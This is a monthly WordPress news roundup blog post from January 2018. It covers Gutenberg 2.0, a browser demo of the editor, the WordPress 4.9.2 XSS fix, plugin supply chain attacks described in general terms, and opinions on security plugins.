The WordPress Update: WordPress 4.9.2 Fixes XSS Vulnerability And Gutenberg Version 2.0 Released

WordPress News You Can Use January 2018 Blue

Welcome, friends, to the first edition of a new feature here at WP Superstars:

The news!

We may not have invented the concept of delivering news to interested readers (though I think we are one of the first to do it), but we plan to provide a curated roundup of the best WordPress news for each month going forward.

If you want to keep abreast of the latest information about WordPress but don’t have time to do the work yourself, this is for you!

Let’s jump in, starting with a topic that will soon become all-too-familiar to you…

Gutenberg 2.0 marches on towards WordPress 5.0

It wouldn’t be a WordPress news roundup without a hefty dose of the upcoming Gutenberg editor.

If you’re not already familiar, the Gutenberg editor is a complete rebuild of the editor that you use to write WordPress posts and pages. It’s not just an aesthetic change, either. It will redefine the way you create content by moving to something called “block-based” editing.

In the biggest news this month, we saw a major Gutenberg milestone – version 2.0. You can read the complete (and lengthy) list of changes in the Gutenberg 2.0 release post.

Some of my favorite feature additions are:

  • The ability to directly paste copied images into Gutenberg
  • A button to copy the entire document, which is essential because of Gutenberg’s block-based nature
  • A better system for publishing posts

Moving away from the development front, WP Tavern also put together “A Collection of Gutenberg Conversations, Resources, and Videos”.

It’s a great post that contains tons of deep discussions and tutorials for getting more out of Gutenberg. Make sure you read the comments, as well, because tons of smart people have contributed additional links that are also worth checking out.

That’s it for Gutenberg news this month – but this definitely won’t be the last time you see Gutenberg in our news roundups.

You can now try Gutenberg without installing it on your own site

This one doesn’t count as news. But on the heels of the Gutenberg news, it’s definitely something new worth sharing!

Because the Gutenberg editor is still in beta, it’s not a good idea to install it on a live site. But for casual users who don’t have local development sites, that beta-status makes it difficult to actually play around with the new editor.

No more!

Tom J Nowell put together an awesome frontend implementation of Gutenberg that allows anyone to play around with the editor right from any browser.

To give it a spin, just head here and explore the aptly named Frontenberg.

WordPress 4.9.2 fixes an XSS vulnerability and other bugs

On January 16th, we got a new security and maintenance release in the form of WordPress 4.9.2.

It didn’t add any new functionality, but it did fix an XSS vulnerability as well as 21 other bugs.

As with all security and maintenance releases, if you haven’t already updated your site, you need to go update right now.

Besides security and maintenance fixes, we’re not going to see any other new features until WordPress 5.0 ships with the Gutenberg editor.

WordPress supply chain attacks are a real concern

In the latter part of 2017, we saw the rise of malicious actions called “supply chain attacks.”

In this type of attack, the malicious actor inserts themselves into an already trusted relationship between the software author and customer.

Here’s how we’ve been seeing that apply to WordPress:

A malicious actor purchases a previously trusted plugin at and inserts a backdoor into the plugin’s code. Then, the thousands of people using that plugin happily update it because, up until before the purchase, the plugin had worked perfectly and the original plugin author (before the sale) was a trusted actor.

What’s the benefit to the malicious actor? Well, so far we’ve seen them use the backdoor to:

  • Insert backlinks for SEO purposes
  • Mine cryptocurrency (this is the downside of those soaring cryptocurrency prices)

Wordfence has done a great job both detecting and reporting on this issue. Their recent article, WordPress Supply Chain Attacks: An Emerging Threat, is an absolute must-read.

It lays out:

  • A deeper explanation of what supply chain attacks are
  • Why malicious actors want to target WordPress with these types of attacks
  • Why trusted plugin authors are willing to sell their plugins
  • How you can protect your website from such attacks

If such exploits continue, I imagine we might also see some changes at

One potential fix would be to apply extra scrutiny to plugins that have recently changed authors, to help make it more difficult for malicious actors to purchase previously-trusted plugins.

If you’d like to learn even more about this issue, I also recommend reading some of these older articles:

Why all-in-one security plugins aren’t necessarily all you need to keep your site safe

I’ve been using WordPress for about ten years now.

In that time, I’ve built enough websites that I’d have to use my toes to keep counting them.

And over those ten years and those ten plus different sites, I’ve never been hacked.

You might be saying, “congratulations, Colin! But what’s the point?”

Well, the point is that I’ve never used an all-in-one security plugin in those ten years of safety.

And that brings me to the next article I want to share – Still Not Using Plugins for Security by Mika Epstein. It’s brief, but it echoes a lot of things I feel based on my own experience using WordPress.

Mika argues, in part, that all-in-one security plugins make people feel complacent and lose the important sense of vigilance required to keep a site secure.

I don’t think the final point is that everyone should stop using security plugins because the situation is by no means that simple.

But I think Mika’s post is a good reminder that security is a set of principles and practices that you need to be constantly aware of – it’s not just something you can activate a plugin for and forget about.

A collection of interesting year in review posts

To most people, the new year means celebration and resolutions.

But to those plugged into the WordPress community, a new year means just one thing:

Year in review blog posts from WordPress businesses.

Here are two of my favorites:

And if you want a really deep reminder of everything that happened in 2017, check out WP Tavern’s WPWeekly 2017 Year in Review.

Have a successful year with WordPress in 2018

If there’s one thing that’s true, it’s this:

For most WordPress users, 2018 will be the biggest change to WordPress that they’ve ever experienced (yes, I’m back on about Gutenberg again).

Long-term, I think that change will be a good thing. But in the short term, casual users and developers alike will need to adapt.

Ride it out, keep learning, and enjoy what WordPress has to offer in 2018.

That’s all for the news – check back next month for more great stuff!

WordPress News You Can Use January 2018 Blue
Scroll to Top
Share via
Copy link